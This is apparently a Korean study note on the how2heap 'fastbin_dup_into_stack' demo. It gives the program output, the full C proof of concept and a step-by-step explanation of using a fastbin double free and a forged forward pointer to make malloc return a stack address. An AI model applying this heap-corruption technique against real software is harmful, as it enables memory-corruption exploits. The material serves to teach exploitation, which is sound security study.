how2heap-fastbin_dup_into_stack

This file extends on fastbin_dup.c by tricking malloc into

returning a pointer to a controlled location (in this case, the stack).

The address we want malloc() to return is 0x7fff16112800.

Allocating 3 buffers.

1st malloc(8): 0x12d8010

2nd malloc(8): 0x12d8030

3rd malloc(8): 0x12d8050

Freeing the first one...

If we free 0x12d8010 again, things will crash because 0x12d8010 is at the top of the free list.

So, instead, we'll free 0x12d8030.

Now, we can free 0x12d8010 again, since it's not the head of the free list.

Now the free list has [ 0x12d8010, 0x12d8030, 0x12d8010 ]. We'll now carry out our attack by modifying data at 0x12d8010.

1st malloc(8): 0x12d8010

2nd malloc(8): 0x12d8030

Now the free list has [ 0x12d8010 ].

Now, we have access to 0x12d8010 while it remains at the head of the free list.

so now we are writing a fake free size (in this case, 0x20) to the stack,

so that malloc will think there is a free chunk there and agree to

return a pointer to it.

Now, we overwrite the first 8 bytes of the data at 0x12d8010 to point right before the 0x20.

3rd malloc(8): 0x12d8010, putting the stack address on the free list

4th malloc(8): 0x7fff16112800

#include <stdio.h>
	#include <stdlib.h>
	int main()
	{
	fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
	"returning a pointer to a controlled location (in this case, the stack).\n");
	unsigned long long stack_var;
	fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);
	fprintf(stderr, "Allocating 3 buffers.\n");
	int *a = malloc(8);
	int *b = malloc(8);
	int *c = malloc(8);
	fprintf(stderr, "1st malloc(8): %p\n", a);
	fprintf(stderr, "2nd malloc(8): %p\n", b);
	fprintf(stderr, "3rd malloc(8): %p\n", c);
	fprintf(stderr, "Freeing the first one...\n");
	free(a);
	fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
	// free(a);
	fprintf(stderr, "So, instead, we'll free %p.\n", b);
	free(b);
	fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
	free(a);
	fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
	"We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
	unsigned long long *d = malloc(8);
	fprintf(stderr, "1st malloc(8): %p\n", d);
	fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
	fprintf(stderr, "Now the free list has [ %p ].\n", a);
	fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
	"so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
	"so that malloc will think there is a free chunk there and agree to\n"
	"return a pointer to it.\n", a);
	stack_var = 0x20;
	fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
	*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
	fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
	fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
	}

a: malloc(8)

b: malloc(8)

c: malloc(8)

free(a)

free(b) //바로 free(a)를 할 수 없다! a가 free list에서 제일 위에 있기 때문! 만약 free(a)하면 a가 또 fastbin에 들어가게 되는데 그러면 a->a->a->..... 무한 반복된다.

free(a)//지금은 free list 제일 위에 b가 있기 때문에 가능! 이제 fastbin에서는 a->b->a가 된다.

malloc(8)-> free list에서 제일 위에 있는 a가 malloc된다. 이제 fastbin에는 b->a가 있다.

malloc(8)-> free list에서 제일 위에 있는 b가 malloc된다. 이제 fastbin에는 a만 남는다.

a의 fd에 스택주소를 넣고 그 스택 주소+8에는 사이즈를 넣는다!

그렇다면 fastbin에 a->스택주소 있는 것으로 인식된다!

따라서

malloc(8)-> free list에서 제일 위에 있는 a가 malloc된다. 이제 fastbin에는 스택주소가 남는다.

malloc(8)-> free list에서 제일 위에 있는 스택주소가 malloc!

c는 굳이 없어도 된다.

즉, 정리하면

fastbin에서

malloc a -> malloc b -> free(a) -> free(b) -> free(a) -> malloc -> malloc -> a의 fd를 스택 위치로 조정, 사이즈 입력 -> malloc -> malloc(이때 스택 부분이 malloc!)